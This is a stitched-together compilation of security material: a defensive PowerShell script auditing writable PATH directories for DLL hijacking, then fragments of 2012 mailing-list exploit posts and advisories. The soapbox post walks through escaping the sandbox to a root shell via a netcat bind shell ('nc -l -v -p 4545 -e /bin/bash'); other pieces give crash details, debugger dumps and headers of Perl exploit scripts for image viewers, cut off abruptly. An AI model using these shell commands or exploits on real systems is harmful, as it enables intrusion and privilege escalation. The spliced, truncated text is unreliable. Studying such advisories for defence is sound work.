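The two conditions above, together with the installer PATH entries listed earlier, can be checked on a host with the following audit script. It is an added example, not code from the advisory or from High-Tech Bridge: it walks the machine-wide PATH and reports any directory on which Authenticated Users, Users or Everyone hold FILE_WRITE_DATA or FILE_APPEND_DATA. The principal names and the DLL name are the ones the advisory gives; everything else is an assumption of this example.

```powershell
# Added example, not part of the HTB23108 advisory or of any vendor's code:
# a read-only audit of every directory on the machine-wide PATH, reporting
# entries where a low-privilege principal holds FILE_WRITE_DATA or
# FILE_APPEND_DATA. That is the precondition the advisory describes for a
# SYSTEM service picking up a planted copy of a DLL it cannot find.

$dllName = 'wlbsctrl.dll'   # the missing DLL named in the advisory

# Groups that every local non-admin account belongs to.
$lowPrivPrincipals = @('NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'Everyone')

# Directory rights that let a caller create a file in the directory:
# CreateFiles is FILE_WRITE_DATA and AppendData is FILE_APPEND_DATA.
# Write, Modify and FullControl all include these two bits.
$writeBits    = [int]([System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                      [System.Security.AccessControl.FileSystemRights]::AppendData)
$genericWrite = 0x40000000   # GENERIC_WRITE, as some ACEs are stored un-mapped
$genericAll   = 0x10000000   # GENERIC_ALL

# Returns the first low-privilege principal with write rights on $dir, else $null.
# Deny ACEs are not evaluated, so a hit is a candidate to confirm by hand.
function Test-LowPrivWritable([string]$dir) {
    $acl = Get-Acl -LiteralPath $dir -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $r = [int]$ace.FileSystemRights
        if (($r -band $writeBits) -or ($r -band $genericWrite) -or ($r -band $genericAll)) {
            return $ace.IdentityReference.Value
        }
    }
    return $null
}

# The search order checks the system directory before PATH, so a legitimate
# copy there means the PATH entries are never consulted for this name.
$systemCopy = Join-Path $env:SystemRoot "System32\$dllName"
if (Test-Path -LiteralPath $systemCopy) {
    Write-Host "$dllName is present in System32; PATH is not searched for it."
} else {
    Write-Host "$dllName is absent from System32; the PATH entries below are searched for it."
}

# Audit the machine-wide PATH (the value that installers such as those listed above modify).
$machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')
foreach ($entry in ($machinePath -split ';' | Where-Object { $_.Trim() })) {
    $dir = [Environment]::ExpandEnvironmentVariables($entry.Trim())
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        Write-Host "MISSING  $dir   (dangling PATH entry)"
        continue
    }
    try   { $who = Test-LowPrivWritable $dir }
    catch { Write-Host "ERROR    $dir   ($($_.Exception.Message))"; continue }
    if ($who) { Write-Host "WRITABLE $dir   by $who" }
    else      { Write-Host "ok       $dir" }
}
```

A directory reported as WRITABLE should have its ACL tightened so that only Administrators and SYSTEM can create files in it, or be removed from the machine-wide PATH.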


Proof of Concept

You can download the PoC (Proof of Concept) that demonstrates exploitation of 
the vulnerability under a non-privileged user account on a default installation 
of Windows 7 with a default installation of the latest version of ActivePerl: 
https://www.htbridge.com/advisory/HTB23108-P0c-Windows-Services.rar

How to exploit:
1. Log in under an unprivileged system account.
2. Download and extract the HTB23108-P0c-Windows-Services.rar archive.
3. Copy 

soapbox Local Root / Privilege Escalation Vulnerability

2012-10-09 Thread pereira
---
soapbox <= 0.3.1 Local Root Exploit
---

Vendor URI: http://dag.wieers.com/home-made/soapbox/

Credit: Jean Pascal Pereira pere...@secbiz.de

Description:

Soapbox allows you to restrict processes to write only to those places you want. 
Read access, however, is still based on file permissions. By preloading the 
Soapbox library, you can run programs as root and monitor which writes/changes 
are made, without them really happening. (Typically 'make install') 

Beware: this can be used for security purposes, but it can deliberately be 
circumvented. Soapbox only impacts dynamically linked programs that properly 
use glibc functions. I'm currently looking into a safer implementation using 
ptrace. 

Soapbox also triggered some bugs in applications that trusted system calls too 
much. So you can use soapbox to test your programs for these kinds of mistakes 
too.

--


First of all, we have to run soapbox on our target system.
I'm going to create a new netcat process spawned in a restricted directory 
(/etc/opt/sbx). 

--
root@havoc:/etc/opt/sbx# soapbox -l log -p /etc/opt/sbx /bin/nc -l -v -p 4545 
-e /bin/bash
--

After establishing a connection to our target system, we get a sandboxed root 
shell.
Let's try to write data to a protected location.

--
$ nc 23.5.0.0 4545
echo boom > /etc/abc
bash: line 1: 1: Bad file descriptor
--

As we can see, soapbox restricts write access to this path.
But what happens if we start another soapbox instance with full file-system 
access?

--
$ nc 23.5.0.0 4545
soapbox -l log -p / /bin/bash # running another instance of soapbox that 
provides full file system access
echo boom > /etc/abc
cat /etc/abc
boom # BOOM!
--

BOOM. Now we're able to start an unrestricted root shell and gain control over 
the file system.

(This is still a local exploit because we were only able to exploit that issue 
remotely by using netcat).


/* http://0xffe4.org */


WingFTP Server Denial of Service Vulnerability

2012-10-09 Thread Anil Pazvant
--

|  WingFTP Server Denial of Service Vulnerability  |

---

Summary

===

WingFTP Server is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to cause the service to crash,
denying service to legitimate users.



CVE number: CVE-2012-4729

Impact: High

Vendor homepage: http://www.wftpserver.com/serverhistory.htm#gotop

Vendor notified: 30/08/2012

Vendor response: Vendor fixed the vulnerability and released the fix.


Affected Products

 
Windows Platforms.


Details
===

It is possible to crash the process by sending two sequential requests
to the zip-file option as an authenticated user.

The output of debugger:



(6e4.c4c): C++ EH exception - code e06d7363 (first chance)   (after first request)


eax=026a6b80 ebx=0001 ecx=0004 edx= esi=0001 edi=
eip=7c90e514 esp=014ce1cc ebp=014ce1dc iopl=0 nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0286
ntdll!KiFastSystemCallRet:
7c90e514 c3  ret

Impact

==

The process crashes and all of its services go down.


Solution


Issue was fixed on Version 4.1.1

http://www.wftpserver.com/serverhistory.htm#gotop


BufferOverflow Vulnerability on Logica HotScan SWIFT Alliance Access Interface

2012-10-09 Thread Anil Pazvant


| BufferOverflow Vulnerability on Logica HotScan SWIFT Alliance Access Interface



Summary

===

The HotScan Listener interface is prone to a buffer-overflow vulnerability
because the application fails to perform adequate boundary checks on
user-supplied input. This allows remote attackers to cause a denial of
service (crash) and possibly execute arbitrary code via a crafted font
file.



CVE number: CVE-2012-2624

Impact: Critical

Vendor notified: May 11, 2012

Vendor response: Vendor patched the vulnerability ( June 16, 2012 )


Affected Products

 

Logica HotScan Interface



Details

===

By sending malicious input to the HotScan listener TCP interface, it is
possible to overwrite the stack by only two bytes. Because the software is
compiled with NXCOMPAT, code execution could not be achieved. However, a
crash of this service can stop all SWIFT processing, which affects the
impact of the vulnerability.

Register output:
ECX 76E801B8 ASCII STATUS_STACK_BUFFER_OVERRUN encountered
EDX 0018F325 ASCII 0A,STATUS_STA
EBX 0042AEAC HOTS_Rec.0042AEAC
ESP 0018F56C
EBP 0018F5E8
ESI 
EDI 
EIP 76E7FF9A kernel32.76E7FF9A


Solution



Vendor released a patch to fix the bug.



Hardcoreview WriteAV Arbitrary Code Execution

2012-10-09 Thread pereira
#!/usr/bin/perl
 
# Hardcoreview WriteAV Arbitrary Code Execution
 
# Author: Jean Pascal Pereira pere...@secbiz.de
 
# Vendor URI: http://sourceforge.net/projects/hardcoreview/
 
# Vendor Description:
# Image browser. Designed and created for professional and amateur watching of image files.
# All kinds of image files ;) . Supports *.jpg, *.gif, *.bmp, *.psd, and many more.
 
# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: C:\Program Files\hardcoreview\hardcoreview.exe C:\research\hcview\crafted.gif
# Symbol search path is: *** Invalid ***
# 
# * Symbol loading may be unreliable without a symbol search path.   *
# * Use .symfix to have the debugger choose a symbol path.   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# 
# Executable search path is: 
# ModLoad: 0040 00443000   hardcoreview.exe
# ModLoad: 7c90 7c9b2000   ntdll.dll
# ModLoad: 7c80 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 5ed0 5edcc000   C:\WINDOWS\system32\OPENGL32.dll
# ModLoad: 77c1 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77dd 77e6b000   C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e7 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 77f1 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e41 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 68b2 68b4   C:\WINDOWS\system32\GLU32.dll
# ModLoad: 7376 737ab000   C:\WINDOWS\system32\DDRAW.dll
# ModLoad: 73bc 73bc6000   C:\WINDOWS\system32\DCIMAN32.dll
# ModLoad: 1000 102be000   C:\Program Files\hardcoreview\DevIL.dll
# ModLoad: 7c42 7c4a7000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll
# ModLoad: 7813 781cb000   C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll
# ModLoad: 0035 00365000   C:\Program Files\hardcoreview\ILU.dll
# ModLoad: 0038 0038f000   C:\Program Files\hardcoreview\ILUT.dll
# ModLoad: 763b 763f9000   C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 5d09 5d12a000   C:\WINDOWS\system32\COMCTL32.dll
# ModLoad: 7c9c 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 77f6 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 003a 003b5000   C:\Program Files\hardcoreview\pthreadVC2.dll
# ModLoad: 71ad 71ad9000   C:\WINDOWS\system32\WSOCK32.dll
# ModLoad: 71ab 71ac7000   C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa 71aa8000   C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 7848 7850e000   C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCP90.dll
# ModLoad: 7852 785c3000   C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_6f74963e\MSVCR90.dll
# (e4c.8c8): Break instruction exception - code 8003 (first chance)
# ModLoad: 7639 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 773d 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 5ad7 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 7472 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 77c0 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 755c 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 774e 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 61dd 61dd6000   C:\WINDOWS\system32\MCD32.DLL
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# ModLoad: 0172 01769000   C:\WINDOWS\system32\VBoxOGLcrutil.dll
# ModLoad: 0162 0171d000   C:\WINDOWS\system32\VBoxOGL.dll
# 

FastStone Image Viewer <= 4.6 ReadAVonIP Arbitrary Code Execution

2012-10-09 Thread pereira
#!/usr/bin/perl
 
# FastStone Image Viewer <= 4.6 ReadAVonIP Arbitrary Code Execution
 
# Author: Jean Pascal Pereira pere...@secbiz.de
 
# Vendor URI: http://www.faststone.org
 
# Vendor Description:
# An image browser, converter and editor that supports all major graphic formats including BMP, JPEG, JPEG 2000,
# GIF, PNG, PCX, TIFF, WMF, ICO, TGA and camera raw files. It has a nice array of features such as image viewing,
# management, comparison, red-eye removal, emailing, resizing, cropping, color adjustments, musical slideshow and much more.
 
# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.

# CommandLine: C:\Program Files\FastStone Image Viewer\FSViewer.exe C:\research\fsview\crafted.gif
# Symbol search path is: *** Invalid ***
# 
# * Symbol loading may be unreliable without a symbol search path.   *
# * Use .symfix to have the debugger choose a symbol path.   *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# 
# Executable search path is: 
# ModLoad: 0040 00a5a000   image0040
# ModLoad: 7c90 7c9b2000   ntdll.dll
# ModLoad: 7c80 7c8f6000   C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd 77e6b000   C:\WINDOWS\system32\advapi32.dll
# ModLoad: 77e7 77f03000   C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe 77ff1000   C:\WINDOWS\system32\Secur32.dll
# ModLoad: 73b5 73b67000   C:\WINDOWS\system32\avifil32.dll
# ModLoad: 77c1 77c68000   C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 7e41 7e4a1000   C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f1 77f59000   C:\WINDOWS\system32\GDI32.dll
# ModLoad: 76b4 76b6d000   C:\WINDOWS\system32\WINMM.dll
# ModLoad: 774e 7761e000   C:\WINDOWS\system32\ole32.dll
# ModLoad: 77be 77bf5000   C:\WINDOWS\system32\MSACM32.dll
# ModLoad: 75a7 75a91000   C:\WINDOWS\system32\MSVFW32.dll
# ModLoad: 7c9c 7d1d7000   C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 77f6 77fd6000   C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 773d 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll
# ModLoad: 763b 763f9000   C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 7712 771ab000   C:\WINDOWS\system32\oleaut32.dll
# ModLoad: 7481 7497e000   C:\WINDOWS\system32\quartz.dll
# ModLoad: 77c0 77c08000   C:\WINDOWS\system32\version.dll
# ModLoad: 7300 73026000   C:\WINDOWS\system32\winspool.drv
# (dd8.ef4): Break instruction exception - code 8003 (first chance)
# ModLoad: 7639 763ad000   C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad7 5ada8000   C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 7472 7476c000   C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c 755ee000   C:\WINDOWS\system32\msctfime.ime
# ModLoad: 5edd 5ede7000   C:\WINDOWS\system32\olepro32.dll
# ModLoad: 7792 77a13000   C:\WINDOWS\system32\SETUPAPI.dll
# ModLoad: 7699 769b5000   C:\WINDOWS\system32\ntshrui.dll
# ModLoad: 76b2 76b31000   C:\WINDOWS\system32\ATL.DLL
# ModLoad: 5b86 5b8b5000   C:\WINDOWS\system32\NETAPI32.dll
# ModLoad: 769c 76a74000   C:\WINDOWS\system32\USERENV.dll
# ModLoad: 73bc 73bc6000   C:\WINDOWS\system32\DCIMAN32.DLL
# ModLoad: 77b4 77b62000   C:\WINDOWS\system32\appHelp.dll
# ModLoad: 76fd 7704f000   C:\WINDOWS\system32\CLBCATQ.DLL
# ModLoad: 7705 77115000   C:\WINDOWS\system32\COMRes.dll
# ModLoad: 77a2 77a74000   C:\WINDOWS\System32\cscui.dll
# ModLoad: 7660 7661d000   C:\WINDOWS\System32\CSCDLL.dll
# ModLoad: 76bf 76bfb000   C:\WINDOWS\system32\psapi.dll
# ModLoad: 75f8 7607d000   C:\WINDOWS\system32\browseui.dll
# (dd8.ef4): Access violation - code c005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=320e ebx=007fcdf2 ecx=0012c000 edx=0013 esi=0011f7b8 edi=
# eip=007cdea2 esp=0011f750 ebp=0011f770 iopl=0 nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010246
# *** WARNING: Unable to verify checksum for image0040
# *** ERROR: Module load completed but symbols could not be loaded for image0040
# image0040+0x3cdea2:
# 007cdea2 893a            mov     dword ptr [edx],edi  ds:0023:0013=78746341
# 0:000> g;g;r;!exploitable -v;q
# (dd8.ef4): Access violation - code c005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# (dd8.ef4): Access violation - code c005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax= ebx= ecx= edx=7c9032bc